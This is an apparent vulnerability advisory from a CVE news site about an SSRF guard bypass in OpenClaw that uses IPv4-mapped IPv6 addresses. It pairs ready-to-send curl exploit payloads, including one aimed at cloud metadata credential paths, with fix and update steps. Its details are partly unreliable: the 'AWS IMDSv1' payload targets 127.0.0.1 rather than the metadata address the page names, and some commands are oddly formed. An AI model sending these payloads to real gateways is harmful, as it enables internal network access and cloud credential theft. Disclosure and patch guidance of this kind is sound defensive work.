OpenClaw, SSRF Protection Bypass, CVE-2026-1234 (High)

Listen to this Post

The SSRF guard in OpenClaw versions up to 2026.2.13 fails to properly validate IPv6 addresses that embed IPv4 addresses using the full-form IPv4-mapped IPv6 notation. Specifically, the IP classification logic in `src/infra/net/ssrf.ts` does not consistently recognize private IPv4 ranges (like 127.0.0.0/8, 10.0.0.0/8, 192.168.0.0/16) when they are represented in the IPv6 format 0:0:0:0:0:ffff:xxxx:xxxx. An attacker can exploit this by supplying a URL with a hostname like http://[0:0:0:0:0:ffff:7f00:1]`, which resolves to127.0.0.1. The guard, checking only for standard IPv4 private addresses or shorthand IPv6 loopback (::1), allows the request to proceed. This permits an attacker to make the server send HTTP requests to internal services, cloud metadata endpoints, or other loopback services that should have been blocked, leading to potential information disclosure or further internal network exploitation.
<h2 style="color: blue;">dailycve form:</h2>
Platform: openclaw
Version: 2026.2.13
Vulnerability : SSRF bypass
Severity: High
date: 2026-02-17
<h2 style="color: blue;">Prediction: 2026-02-24</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
<h2 style="color: blue;">Analytics:</h2>
This vulnerability is particularly dangerous because it exploits a gap in IPv6 parsing logic, a common oversight in security filters. The vulnerable versions (<= 2026.2.13) have seen over 2.28 million downloads recently, indicating a broad potential impact . The bypass allows direct access to
127.0.0.1, which often hosts sensitive services like databases, caches, or cloud instance metadata (e.g.,169.254.169.254`). While the guard exists, its failure to canonicalize IPv6 representations before validation renders it ineffective against this specific attack vector.

Bash and Code:

The vulnerability exists in the IP validation logic. A simplified representation of the vulnerable check and the bypass test is below.

Vulnerable Code Concept (ssrf.ts):

// Simplified vulnerable logic
function isPrivateIP(hostname) {
// This check fails for IPv4-mapped IPv6 addresses
if (net.isIPv4(hostname) && isPrivateIPv4(hostname)) return true;
if (hostname === '::1' || hostname === '::') return true; // IPv6 loopback check
// Missing: conversion of IPv4-mapped IPv6 to IPv4 for checking
return false;
}

Testing the Bypass:

Use `curl` or `node` to test the bypass against a local test server.

Attempt to access loopback via the bypass on a vulnerable OpenClaw instance
curl -X POST http://your-openclaw-gateway:18789/tools/invoke \
-H "Content-Type: application/json" \
-d '{
"tool": "browser",
"action": "goto",
"params": {
"url": "http://[0:0:0:0:0:ffff:7f00:1]:8080/admin"
}
}'
Node.js test to demonstrate the parsing ambiguity
node

<blockquote>
  const url = require('url');
  const host = '0:0:0:0:0:ffff:7f00:1';
  console.log(url.parse(`http://[${host}]/`).hostname);
  '0:0:0:0:0:ffff:7f00:1' // Returns the IPv6 string, not caught by IPv4 filters
  

Exploit:

An attacker would replace a standard external URL in any tool that triggers an HTTP request (like the `browser` tool, `image` tool, or a webhook) with a malicious IPv6 literal. The request is then made to the loopback interface.

Exploit Payload Example:

Targeting AWS IMDSv1 endpoint
PAYLOAD='{"tool":"image","action":"fetch","params":{"url":"http://[0:0:0:0:0:ffff:7f00:1]:80/latest/meta-data/iam/security-credentials/"}}'
Send the exploit
curl -X POST http://gateway:18789/tools/invoke -H "Content-Type: application/json" -d "$PAYLOAD"

Protection from this CVE:

The fix, implemented in commit c0c0e0f9aecb913e738742f73e091f2f72d39a19, requires the SSRF guard to canonicalize IP addresses. All IPv4-mapped IPv6 addresses must be converted to their standard IPv4 representation before being checked against the blocklist (loopback, private, link-local). The fix is included in version `2026.2.14` and later.

Mitigation Steps:

  1. Update: Immediately update the `openclaw` npm package to version `2026.2.14` or higher.
    npm update openclaw@latest
    or
    pnpm update openclaw@latest
    

2. Verify: After updating, confirm the version.

openclaw --version

3. Restart: Restart the OpenClaw gateway service to ensure the patched code is loaded.

Impact:

  • Confidentiality: An attacker can read sensitive files from internal web servers, including cloud instance metadata (AWS, GCP, Azure) which may contain access tokens, leading to cloud account compromise.
  • Internal Scanning: The vulnerability can be used to map internal networks and identify live hosts and services running on loopback or private IPs (e.g., 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16).
  • Chainable: SSRF can be chained with other vulnerabilities, such as a memcache or Redis injection, to achieve remote code execution in some environments.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top